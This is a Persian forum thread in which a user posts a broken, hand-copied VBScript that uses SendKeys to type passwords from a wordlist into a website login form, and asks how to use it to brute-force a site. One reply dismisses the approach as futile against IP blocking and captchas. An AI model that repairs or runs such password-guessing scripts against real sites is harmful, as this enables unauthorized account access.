discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

با سلام خدمت مدیران و کاربران محترم. چند روز قبل راجب حمله ی بروت فورس با نت پد در  آدرس https://www.aparat.com/v/4tqPM/rute_force_با_notepad_و_vbs. ویدیویی را دیدم. میخواستم بدونم این کار امکان پذیره یا نه؟اگه میشه لطفا راهنمایی کنید چون من نفهمیدم ویدیو دقیقا چی میگه. اگه هم نمیشه آموزش بروت فورس رو با Cain بزارید.ممنون. کدی هم که استفاده شده این هست:

Set objFSO = CreateObject("scripting.FilesystemObject")
Set objFile = objFsO.OpenTextFile("C:\test.txt", For Reading) 
set wshShe11 = WScript.CreateObject("WScript.She11")
wscript.sleep (10000)
const For Reading = 1
Dim strPasssword
Do Until objFile.AtEndOfstream
wshshe11.sendkeys "+{HOME}"
wshshe11.sendkeys "lmr.t@t0l"
wshshe11.sendkeys "{TAB}"
strPassword = obfile.Readline
wshshe11.sendkeys strPassword
wshshe11.sendkeys "~"
wshshe11.sendkeys "{ENTER}"
wshshe11.sleep (50)
Loop     البته بگم که من کد رو خودم از رو ویدیو نوشتم و چون کیفیتش یکم پایین بود شاید درست نباشه . من کد رو در فایلی با فرمت VBS ذخیره کردم که باز نمیشه چون تو این فرمت نباید این جور متن نوشت. من نمیدونم چطور از فایل استفاده کنم که بشه حمله رو انجام داد. لطفا راهنمایی کنید، با تشکر.

به اشتراک گذاری این ارسال

لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در در 1397/05/13, 12:48:15، OOOHHHAAACCCKKKOOO گفته است :

با سلام خدمت مدیران و کاربران محترم. چند روز قبل راجب حمله ی بروت فورس با نت پد در  آدرس https://www.aparat.com/v/4tqPM/rute_force_با_notepad_و_vbs. ویدیویی را دیدم. میخواستم بدونم این کار امکان پذیره یا نه؟اگه میشه لطفا راهنمایی کنید چون من نفهمیدم ویدیو دقیقا چی میگه. اگه هم نمیشه آموزش بروت فورس رو با Cain بزارید.ممنون. کدی هم که استفاده شده این هست:

Set objFSO = CreateObject("scripting.FilesystemObject")
Set objFile = objFsO.OpenTextFile("C:\test.txt", For Reading) 
set wshShe11 = WScript.CreateObject("WScript.She11")
wscript.sleep (10000)
const For Reading = 1
Dim strPasssword
Do Until objFile.AtEndOfstream
wshshe11.sendkeys "+{HOME}"
wshshe11.sendkeys "lmr.t@t0l"
wshshe11.sendkeys "{TAB}"
strPassword = obfile.Readline
wshshe11.sendkeys strPassword
wshshe11.sendkeys "~"
wshshe11.sendkeys "{ENTER}"
wshshe11.sleep (50)
Loop     البته بگم که من کد رو خودم از رو ویدیو نوشتم و چون کیفیتش یکم پایین بود شاید درست نباشه . من کد رو در فایلی با فرمت VBS ذخیره کردم که باز نمیشه چون تو این فرمت نباید این جور متن نوشت. من نمیدونم چطور از فایل استفاده کنم که بشه حمله رو انجام داد. لطفا راهنمایی کنید، با تشکر.

فکر میکنم به زبان ویژوال بیسیک اسکریپت نوشته شده VB Script . حالا دقیقا میخواید بروت فورس رو روی چی انجام بدید ؟

لینک به ارسال
در در 1397/05/28, 18:52:32، REX گفته است :

دوست عزیز اینجا چت رم نیست که! سوال پرسیدید اجازه بدید تا دوستان پاسخ بدند!

اخطار در صورت تکرار اکانت شما  بن میشه .

یا حق.

ببخشید دیگه تکرار نمیشه. واقعا ببخشید.

لینک به ارسال
در در 1397/05/28, 22:37:36، virtual_hate گفته است :

سلام دوست عزیز

خود شما میتونید با نوشتن کدهای معمول در اکثر زبان های برنامه نویسی اقدام به ایجاد اسکریپت های بکنید که اینکار رو برای شما انجام بده

اگر شما تخصصی در برنامه نویسی ندارید میتونید از نرم افزارها  و اسکریپت های زیادی در این زمینه نوشته شده کمک بگیرید به جای اینکه وقت خودتون رو صرف یک کد بی محتوا و یک اموزش بی هدف بکنید میتونید از روش های دیگری برای پیدا کرد پسورد استفاده کنید

اگر پسوردی که به دنبال ان هستید پسوردی بیشتر از 8 کاراکتر و با کاراکترهای خاص ایجاد شده باشد و بخواهید عمل بورت فورس رو بصورت انلاین انجام بدید عملا اینکار بی فایده خواهد بود گرچه در حال حاضر اکثر سایت ها از مسدود کردن ای پی و کد کپچا استفاده میکنن و این کدی که در نوت پد نوشته شده بود قطعا این امکان رو نداره که حتی بتونه از یک پروکسی لیست استفاده کنه پس وقت خودتون رو بیهوده تلف نکنید.

ممنونم.

لینک به ارسال
در در 1397/05/28, 22:33:09، Mr.Python گفته است :

فکر میکنم به زبان ویژوال بیسیک اسکریپت نوشته شده VB Script . حالا دقیقا میخواید بروت فورس رو روی چی انجام بدید ؟

روی سایت دوست عزیز.

لینک به ارسال

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری